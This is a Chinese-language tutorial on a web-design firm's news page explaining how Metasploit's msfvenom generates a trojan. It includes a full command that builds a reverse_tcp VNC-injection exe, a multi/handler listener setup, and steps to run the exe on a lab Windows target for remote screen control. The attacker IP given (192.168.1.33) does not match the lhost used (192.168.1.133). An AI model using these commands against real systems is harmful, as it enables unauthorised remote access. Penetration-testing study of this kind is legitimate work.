网站建设资讯

NEWS

网站建设资讯

Metasploit中木马生成的原理是什么

Metasploit中木马生成的原理是什么,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

创新互联专注为客户提供全方位的互联网综合服务,包含不限于成都网站设计、做网站、宕昌网络推广、成都小程序开发、宕昌网络营销、宕昌企业策划、宕昌品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;创新互联为所有大学生创业者提供宕昌建站搭建服务,24小时服务热线:028-86922220,官方网址:www.cdcxhl.com

一、生成方式:利用msf模块中的msfvenom模块

二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

三、msfvenom命令行选项如下

-p, --payload           指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定    

-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all     

-n, --nopsled            为payload预先指定一个NOP滑动长度     

-f, --format             指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)     

-e, --encoder    [encoder]       指定需要使用的encoder(编码器)     

-a, --arch         指定payload的目标架构         

--platform         指定payload的目标平台     

-s, --space              设定有效攻击荷载的最大长度     

-b, --bad-chars            设定规避字符集,比如: '\x00\xff'     

-i, --iterations          指定payload的编码次数     

-c, --add-code             指定一个附加的win32 shellcode文件    

-x, --template             指定一个自定义的可执行文件作为模板     

-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行         

--payload-options            列举payload的标准选项     

-o, --out                  保存payload     

-v, --var-name             指定一个自定义的变量,以确定输出格式         

--shellest                   最小化生成payload     

-h, --help                       查看帮助选项         

--help-formats               查看msf支持的输出格式列表

四、使用方法

1、msfvenom --list platforms   显示支持的平台

Metasploit中木马生成的原理是什么

2、msfvenom --list formats   显示支持的格式

Metasploit中木马生成的原理是什么

Metasploit中木马生成的原理是什么

3、msfvenom --list archs   显示支持的架构

Metasploit中木马生成的原理是什么

4、msfvenom --list encoders   显示支持的编码器

Metasploit中木马生成的原理是什么

5、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33 

攻击端口:12121 

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

Metasploit中木马生成的原理是什么

6、进入监听模块          use exploit/multi/handler 

7、设置payload反弹    set payload windows/x64/vncinject/reverse_tcp

Metasploit中木马生成的原理是什么

8、查看需要设置的参数:show options

Metasploit中木马生成的原理是什么

9、设置攻击机ip:set lhost 192.168.1.133

10、设置攻击端口:set lport 12121

Metasploit中木马生成的原理是什么

11、将生成的exe文件上传到目标主机并运行

12、run攻击

Metasploit中木马生成的原理是什么

13、攻击机的监控画面

Metasploit中木马生成的原理是什么

14、目标主机画面

Metasploit中木马生成的原理是什么

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注创新互联行业资讯频道,感谢您对创新互联的支持。


当前名称:Metasploit中木马生成的原理是什么
当前地址:http://cdweb.net/article/ipoigd.html